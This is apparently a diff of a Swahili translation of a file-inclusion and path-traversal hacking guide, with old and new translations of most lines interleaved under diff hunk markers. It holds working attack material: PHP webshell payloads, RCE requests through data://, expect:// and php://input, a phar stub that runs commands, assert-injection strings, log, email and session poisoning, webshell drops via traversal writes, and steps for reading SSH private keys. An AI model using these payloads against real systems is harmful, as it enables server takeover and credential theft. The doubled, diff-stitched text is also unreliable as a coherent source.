Katika python, katika msimbo kama huu:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
Ikiwa mtumiaji atatoa **absolute path** kwa **`file_name`**, **previous path** inafutwa tu:
Ikiwa mtumiaji anapitisha **absolute path** kwa **`file_name`**, **njia ya awali inaondolewa tu**:
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
Hii ni tabia iliyokusudiwa kulingana na [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):
> Ikiwa sehemu ni njia kamili, sehemu zote zilizotangulia zinatupwa na kuunganisha kunaendelea kutoka kwenye sehemu ya njia kamili.
> Ikiwa sehemu ni absolute path, vipengele vyote vya awali vinatupwa na kuunganishwa kunaendelea kutoka kwa sehemu ya absolute path.
## Java Orodhesha madirektori
## Java: Kuorodhesha Folda
Inaonekana kwamba ikiwa una Path Traversal katika Java na unauliza **folda** badala ya faili, **orodha ya folda itarudishwa**. Hii haitatokee katika lugha nyingine (kwa kadiri ninavyojua).
Inaonekana kwamba ikiwa una Path Traversal katika Java na ukaomba **folda** badala ya faili, **orodha ya folda inarudishwa**. Hii haitatokea katika lugha nyingine (kwa kadri ninavyojua).
## Vigezo 25 vya Juu
Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa local file inclusion (LFI) (kutoka [link](https://twitter.com/trbughunters/status/1279768631845494787)):
Hapa kuna orodha ya vigezo 25 za juu ambazo zinaweza kuwa hatarini kwa local file inclusion (LFI) vulnerabilities (kutoka [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
@ -211,27 +211,27 @@ Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa local fil
?mod={payload}
?conf={payload}
```
## LFI / RFI kutumia PHP wrappers & protocols
## LFI / RFI using PHP wrappers & protocols
### php://filter
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data** kabla ya data kusomwa au kuandikwa. Kuna aina 5 za filters:
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko ya data** kabla ya kusomwa au kuandikwa. Kuna aina 5 za filters:
- [String Filters](https://www.php.net/manual/en/filters.string.php):
- `string.rot13`
- `string.toupper`
- `string.tolower`
- `string.strip_tags`: Ondoa tags kutoka kwenye data (kila kitu kati ya "<" na ">" chars)
- Kumbuka kuwa chujio hiki kimeondoka katika matoleo ya kisasa ya PHP
- Note that this filter has disappear from the modern versions of PHP
- [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
- `convert.base64-encode`
- `convert.base64-decode`
- `convert.quoted-printable-encode`
- `convert.quoted-printable-decode`
- `convert.iconv.*` : Hubadilisha kuwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya encodings zote** zinazotumika endesha kwenye console: `iconv -l`
- `convert.iconv.*` : Transforms to a different encoding(`convert.iconv.<input_enc>.<output_enc>`) . Ili kupata **orodha ya encodings zote** zinazoungwa mkono, endesha kwenye console: `iconv -l`
> [!WARNING]
> Kwa kutumia vibaya chujio cha `convert.iconv.*` unaweza **kutengeneza maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya include process isimamie maandishi yoyote. Kwa habari zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
> Kwa kutumia vibaya conversion filter ya `convert.iconv.*` unaweza **kutengeneza maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya function kama include isindike maandishi hayo. Kwa maelezo zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
- [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
- `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
@ -240,9 +240,9 @@ PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data*
- `mcrypt.*` : Deprecated
- `mdecrypt.*` : Deprecated
- Other Filters
- Ukiendesha katika php `var_dump(stream_get_filters());` utaona baadhi ya **vichujio visivyotarajiwa**:
- Running in php `var_dump(stream_get_filters());` you can find a couple of **unexpected filters**:
- `consumed`
- `dechunk`: inarudisha nyuma HTTP chunked encoding
- `dechunk`: reverses HTTP chunked encoding
- `convert.*`
```php
# String Filters
@ -271,39 +271,39 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
> [!WARNING]
> Sehemu "php://filter" haizingatii tofauti za herufi
> Sehemu "php://filter" haitegemei herufi (case insensitive)
### Kutumia php filters kama oracle kusoma faili yoyote
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) inapendekeza mbinu ya kusoma faili ya ndani bila server kurudisha yaliyomo. Mbinu hii inategemea **boolean exfiltration of the file (char by char) using php filters** kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kuongeza maandishi kiasi cha kutosha kushinikiza php kutoa hitilafu.
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) imependekezwa mbinu ya kusoma faili ya ndani bila kupata output ikirejeshwa na server. Mbinu hii inategemea **boolean exfiltration of the file (char by char) using php filters** kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya maandishi kuwa makubwa vya kutosha hadi php itokee exception.
Katika post ya asili unaweza kupata maelezo ya kina ya mbinu hii, lakini hapa kuna muhtasari mfupi:
Katika original post unaweza kupata maelezo ya kina ya mbinu, lakini hapa ni muhtasari mfupi:
- Tumia codec **`UCS-4LE`** kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string ukuwe kwa kiasi kinachoongezeka kwa kasi (exponentially).
- Hii itatumika kuzalisha **maandishi makubwa sana wakati herufi ya mwanzo itakaponikuliwa kwa usahihi** kiasi kwamba php itasababisha **error**.
- Filter ya **dechunk** itafuta kila kitu **ikiwa char ya kwanza si hexadecimal**, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na iliyo hapo awali (na filters nyingine kulingana na herufi iliyokisiwa), itatuwezesha kukisia herufi mwanzoni mwa maandishi kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe herufi ya hexadecimal. Kwa kuwa ikiwa ni hex, dechunk haitafuta na mlipuko wa awali utasababisha php error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano kwa sababu ikiwa tutaweka codec hii 6 mara a->b->c->d->e->f->g herufi haitakuwa tena tabia ya hexadecimal, kwa hivyo dechunk haitaiangusha na php error itasababisha kwa sababu inazidisha na initial bomb.
- Kwa kutumia mabadiliko mingine kama **rot13** mwanzoni inawezekana leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine kwenye eneo la hex).
- Wakati char ya mwanzo ni namba inahitajika kui-base64 encode na leak herufi 2 za kwanza ili leak namba hiyo.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa chars na kupata mahali pa kwanza herufi nyingine za maandishi.
- Na ili kuwaze kupata **further data** wazo ni **kutengeneza 2 bytes za junk data mwanzoni** kwa kutumia **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** kuzifanya zi**pivot with the next 2 bytes**, na d**elete the data until the junk data** (hii itaondoa bytes 2 za mwanzo za maandishi ya awali). Endelea kufanya hivyo hadi utakapofikia sehemu unayotaka leak.
- Tumia codec **`UCS-4LE`** ili kuweka herufi ya mbele ya maandishi mwanzoni na kufanya ukubwa wa string kuongezeka kwa mfumuko.
- Hii itatumika kuzalisha **maandishi ambayo ni makubwa sana wakati herufi ya kwanza inakisia kwa usahihi** kiasi kwamba php itasababisha **error**.
- The **dechunk** filter itakayokuwa inafanya **remove everything if the first char is not an hexadecimal**, kwa hivyo tunaweza kujua kama herufi ya kwanza ni hex.
- Hii, ikichanganywa na ile ya hapo juu (na filters nyingine kulingana na herufi inayokisia), itaturuhusu kukisia herufi mwanzoni kwa kuona lini tunafanya mabadiliko ya kutosha kuifanya isiwe tabia ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitafuta na bomu la mwanzo litasababisha php error.
- The codec **convert.iconv.UNICODE.CP930** transforms every letter in the following one (so after this codec: a -> b). Hii inatuwezesha kugundua kama herufi ya kwanza ni `a`, kwa mfano, kwa sababu tukitumia codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena katika safu ya hexadecimal; hivyo dechunk haitaitoa na php error itachochewa kwa sababu inazidisha na bomu la mwanzo.
- Kutumia mabadiliko mengine kama **rot13** mwanzoni inawezekana ku leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine katika safu ya hex).
- Wakati herufi ya mwanzo ni namba ni lazima ui- base64 encode na leak herufi 2 za kwanza ili kupata namba.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa herufi na kupata katika nafasi ya kwanza herufi nyingine za maandishi.
- Na ili kuwa na uwezo wa kupata **further data** wazo ni **kuzalisha bytes 2 za takataka mwanzoni** kwa **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** ili kuifanya **pivot with the next 2 bytes**, na d**elete the data until the junk data** (hii itatoa bytes 2 za mwanzo za maandishi ya awali). Endelea kufanya hivi hadi ufikie sehemu unayotaka ku leak.
Katika post pia ilileak zana ya kufanya hili moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
Katika post pia ilifichuliwa zana ya kufanya hii kiotomatiki: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
### php://fd
This wrapper inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate yaliyomo ya faili zilizofunguliwa:
Wrapper hii inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu kuexfiltrate content ya files zilizo wazi:
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (Sijui jinsi hii ingefaa katika attack)
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (sijui jinsi hii ingekuwa muhimu katika shambulio)
### zip:// and rar://
Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie.\
Ili kuweza abuse the rar protocol, inahitaji **kuwezeshwa mahsusi**
Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie it.\
Ili kuweza kutumia vibaya rar protocol, **inahitaji kuamilishwa kwa njia maalum**.
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
@ -328,24 +328,24 @@ http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
Kumbuka kwamba protokoli hii inadhibitiwa na usanidi wa php **`allow_url_open`** na **`allow_url_include`**
Kumbuka kwamba itifaki hii imezuiwa na usanidi wa php **`allow_url_open`** na **`allow_url_include`**
### expect://
Expect inapaswa kuwa imewezeshwa. Unaweza kutekeleza msimbo kwa kutumia hii:
Expect inapaswa kuamilishwa. Unaweza execute code kwa kutumia hii:
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```
### input://
Taja payload yako katika POST parameters:
Taja payload yako katika vigezo vya POST:
```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```
### phar://
Faili la `.phar` linaweza kutumika kutekeleza PHP code wakati programu ya wavuti inapotumia function kama `include` kwa ajili ya kupakia faili. Kipande cha PHP cha chini kinaonyesha uundaji wa faili la `.phar`:
Faili ya `.phar` inaweza kutumika kutekeleza msimbo wa PHP wakati programu ya wavuti inatumia kazi kama `include` kwa ajili ya kupakia faili. Mfano wa msimbo wa PHP uliotolewa hapa chini unaonyesha utengenezaji wa faili `.phar`:
```php
<?php
$phar = new Phar('test.phar');
@ -354,13 +354,13 @@ $phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
Ili ku-compile faili la `.phar`, amri ifuatayo inapaswa kutekelezwa:
Ili kujenga faili ya `.phar`, amri ifuatayo inapaswa kutekelezwa:
```bash
php --define phar.readonly=0 create_path.php
```
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
Katika kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.
Kwenye kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions kama `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, au `filesize()`, kujaribu udhuru wa deserialization kunaweza kufanywa. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.
For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:
@ -373,36 +373,36 @@ phar-deserialization.md
### CVE-2024-2961
Ilikuwa inawezekana kutumia vibaya **any arbitrary file read from PHP that supports php filters** kupata RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** katika PHP heap ilitumiwa vibaya ili **alter the chain of free chunks** za ukubwa maalum ili kuweza **write anything in any address**, hivyo hook iliongezwa kuitisha **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kutumia zaidi php filters.
Ilikuwa inawezekana kutumia vibaya **any arbitrary file read from PHP that supports php filters** ili kupata RCE. Maelezo ya kina yanaweza [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: a **3 byte overflow** in the PHP heap was abused to **alter the chain of free chunks** of anspecific size in order to be able to **write anything in any address**, so a hook was added to call **`system`**.\
Ilikuwa inawezekana ku-alloc chunks of specific sizes abusing more php filters.
### More protocols
Angalia zaidi[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
Angalia zaidi possible[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika katika memory au katika faili ya muda (sidhani jinsi hii inaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kupata filesystem ya eneo
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kupata HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kupata FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Mtiririko ya compression
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (Hairejeshi chochote kinachoweza kuchapishwa, hivyo sio muhimu hapa)
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika kwenye memory au kwenye faili ya muda (siwezi kuona jinsi hii inaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kufikia filesystem ya ndani
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kufikia URLs za HTTP(s)
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kufikia URLs za FTP(s)
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Mtiririko wa compression
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Kutafuta pathnames zinazofanana na pattern (Hakirudishi kitu chochote kinachoweza kuchapishwa, hivyo sio muhimu hapa)
- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Si muhimu kusoma arbitrary files)
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Haifai kusoma faili za aina yoyote)
## LFI via PHP's 'assert'
Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati wa kushughulikia function ya 'assert', ambayo inaweza kutekeleza msimbo ndani ya strings. Hii ni tatizo hasa ikiwa input inayojumuisha characters za directory traversal kama ".." inakaguliwa lakini haijasafishwa ipasavyo.
Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa pale unaposhughulika na function 'assert', ambayo inaweza kutekeleza msimbo uliomo katika strings. Hii ni tatizo hasa ikiwa ingizo lenye characters za directory traversal kama ".." linachunguzwa lakini halijasafishwa ipasavyo.
Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:
For example, PHP code might be designed to prevent directory traversal like so:
```bash
assert("strpos('$file', '..') === false") or die("");
```
Ingawa hili linalenga kuzuia traversal, kwa bahati mbaya linaunda vector kwa ajili ya code injection. Ili kuvitumia kusoma file contents, attacker anaweza kutumia:
Ingawa hili linakusudia kuzuia traversal, kwa bahati mbaya linaleta vektori ya code injection. Ili kutumia hili kusoma yaliyomo kwenye faili, mshambuliaji anaweza kutumia:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
Kwa njia sawa, kwa kutekeleza amri yoyote za mfumo, mtu anaweza kutumia:
Vivyo hivyo, kwa kutekeleza amri za mfumo yoyote, mtu anaweza kutumia:
```plaintext
' and die(system("id")) or '
```
@ -411,38 +411,38 @@ Ni muhimu **URL-encode these payloads**.
## PHP Blind Path Traversal
> [!WARNING]
> Mbinu hii inafaa katika kesi ambapo wewe unadhibiti **file path** ya **PHP function** ambayo ita **access a file** lakini hutaona yaliyomo ya faili (kama simu rahisi ya **`file()`**) kwani yaliyomo hayajaonyeshwa.
> Mbinu hii inahusu matukio ambapo **undhibiti** **njia ya faili** ya **function ya PHP** ambayo itafikia faili lakini hautaona yaliyomo ya faili (kama simu rahisi kwa **`file()`**) lakini yaliyomo hayajaonyeshwa.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumiwa via PHP filter ili **exfiltrate the content of a file via an error oracle**.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) it's explained how a blind path traversal can be abused via PHP filter to **exfiltrate the content of a file via an error oracle**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya faili kuwa **big** kiasi kwamba **PHP function opening** faili itasababisha **error**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** ili kufanya yaliyomo ya faili kuwa hivyo **big** kiasi kwamba **PHP function inayofungua** faili itasababisha **kosa**.
Kisha, ili leak the first char filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13** na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika ili **place other chars at the beggining and leak them**.
Kisha, ili leak char ya kwanza filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13**, na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumiwa kuweka chars nyingine mwanzoni na leak hizo.
Functions ambazo zinaweza kuwa hatarini: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
**Functions ambazo zinaweza kuwa hatarini**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
Kwa maelezo ya kiufundi angalia post uliotajwa!
Kwa maelezo ya kiufundi angalia chapisho lililotajwa!
## LFI2RCE
### Arbitrary File Write via Path Traversal (Webshell RCE)
Wakati code ya server-side inayokubali/uploads faili inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, jina la faili au URL) bila canonicalising na validating, `..` segments na absolute paths zinaweza kutoroka kutoka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kwa kawaida unapata unauthenticated RCE kwa kuacha webshell.
When server-side code that ingests/uploads files builds the destination path using user-controlled data (e.g., a filename or URL) without canonicalising and validating it, `..` segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.
Typical exploitation workflow:
- Tambua write primitive katika endpoint au background worker inayokubali path/filename na kuandika yaliyomo kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Tambua web-exposed directories. Common examples:
- Tambua primitive ya kuandika katika endpoint au background worker inayokubali path/filename na inaandika content kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
- Tambua web-exposed directories. Mifano ya kawaida:
- Apache/PHP: `/var/www/html/`
- Tomcat/Jetty: `<tomcat>/webapps/ROOT/` → drop `shell.jsp`
- IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx`
- Tengeneza traversal path inayovunja kutoka kwenye intended storage directory hadi webroot, na jumuisha yaliyomo ya webshell yako.
- Tembelea payload ulioweka na utekeleze amri.
- Tengeneza traversal path inayovunja kutoka directory ya kuhifadhi yaliyokusudiwa hadi webroot, na jumuisha webshell content yako.
- Tembelea payload uliouacha na utekeleze amri.
Vidokezo:
- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
- Kwenye Java stacks, uandishi huu wa faili mara nyingi hufanywa kwa simple `File`/`Paths` concatenation. Ukosefu wa canonicalisation/allow-listing ndiko kasoro kuu.
- Huduma iliyo vulnerable inayofanya uandikaji inaweza kusikiliza kwenye port isiyo-HTTP (mfano, a JMF XML listener on TCP 4004). Portal kuu ya web (port tofauti) baadaye itahudumia payload yako.
- Katika stacks za Java, uandishi wa faili mara nyingi umefanywa kwa concatenation rahisi ya `File`/`Paths`. Ukosefu wa canonicalisation/allow-listing ndio kasoro kuu.
Generic XML/JMF-style example (product schemas zinatofautiana DOCTYPE/body wrapper haina umuhimu kwa traversal):
Generic XML/JMF-style example (product schemas vary the DOCTYPE/body wrapper is irrelevant for the traversal):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
@ -466,26 +466,26 @@ in.transferTo(out);
</Command>
</JMF>
```
Uimarishaji unaofanya kazi dhidi ya aina hii ya hitilafu:
- Weka njia hadi canonical path na udhibiti kwamba ni mrithi wa saraka ya msingi iliyoorodheshwa.
- Kataa njia yoyote inayojumuisha `..`, absolute roots, au drive letters; pendelea generated filenames.
- Endesha mchakato wa kuandika kama akaunti yenye ruhusa ndogo na tofautisha saraka za kuandika kutoka kwa served roots.
Uimarishaji unaozuia aina hii ya hitilafu:
- Tathmini kuwa path ni canonical na uhakikishe ni subdirectory ya directory ya msingi iliyoorodheshwa.
- Kataa path yoyote yenye `..`, root za absolute, au herufi za drive; pendelea majina ya faili yaliyozalishwa.
- Endesha writer kama akaunti yenye vibali vidogo na gawanya directories za kuandika kutoka kwa served roots.
## Remote File Inclusion
Imeelezewa hapo awali, [**follow this link**](#remote-file-inclusion).
Explained previously, [**follow this link**](#remote-file-inclusion).
### Kupitia faili za logi za Apache/Nginx
### Via Apache/Nginx log file
Iwapo server ya Apache au Nginx iko **vulnerable to LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na ku-include faili hilo
If the Apache or Nginx server is **vulnerable to LFI** inside the include function you could try to access to **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, set inside the **user agent** or inside a **GET parameter** a php shell like **`<?php system($_GET['c']); ?>`** and include that file
> [!WARNING]
> Kumbuka kwamba **kama utatumia double quotes** kwa shell badala ya **simple quotes**, double quotes zitabadilishwa kwa string "_**quote;**_", **PHP itatoa kosa** hapo na **hakutakuwa na chochote kingine kitakachotekelezwa**.
> Kumbuka kwamba **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
>
> Pia, hakikisha **unaandika payload kwa usahihi** au PHP itatoa kosa kila mara itakapo jaribu kupakia faili ya log na hautakuwa na fursa ya pili.
> Pia, hakikisha umeandika payload ipasavyo au PHP itatoa kosa kila mara itakapojaribu kupakia log file na hautapata nafasi ya pili.
Hii pia inaweza kufanywa katika logi nyingine lakini **kuwa mwangalifu,** code ndani ya logi inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" katika Base64 na inachanganuliwa ndani ya logi. PHPShell inaweza kuingizwa ndani ya header hii.\
Njia nyingine zinazowezekana za logi:
This could also be done in other logs but **be careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.\
Njia nyingine za log zinazowezekana:
```python
/var/log/apache2/access.log
/var/log/apache/access.log
@ -499,18 +499,18 @@ Njia nyingine zinazowezekana za logi:
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Kupitia Email
### Kupitia Barua pepe
**Tuma barua** kwa akaunti ya ndani (user@localhost) ikiwa na PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu ku-include barua ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
**Tuma barua pepe** kwa akaunti ya ndani (user@localhost) ambayo ina PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na ujaribu kuijumuisha katika barua pepe ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
### Kupitia /proc/*/fd/*
1. Upload a lot of shells (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)
1. Pakia shells nyingi (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), ambapo $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)
### Kupitia /proc/self/environ
Kama log file, tuma payload katika User-Agent, itaonekana ndani ya /proc/self/environ file
Kama faili ya log, tuma payload kwenye User-Agent; itaonekana ndani ya faili /proc/self/environ
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
@ -521,22 +521,22 @@ Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (e.g : `<?php sys
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
Ili kufanya faili kusomeka vizuri ni bora kuingiza kwenye metadata ya picha/doc/pdf
Ili kufanya faili iwe rahisi kusomeka, ni bora kuingiza kwenye metadata ya picha/doc/pdf
### Kupitia Zip fie upload
### Kupakia faili la ZIP
Pakia ZIP file inayojumuisha PHP shell iliyobanwa kisha ufikie:
Pakia ZIP file iliyo na PHP shell iliyobanwa, kisha upate ufikiaji:
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### Kupitia PHP sessions
Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)
Angalia kama tovuti inatumia PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
Katika PHP vikao hivi vinahifadhiwa ndani ya _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili
Katika PHP sessions hizi zinahifadhiwa ndani ya _/var/lib/php5/sess\\_\[PHPSESSID]\_ files
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
@ -551,68 +551,69 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
```
### Kupitia ssh
Ikiwa ssh imewekwa, angalia ni mtumiaji gani anayetumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
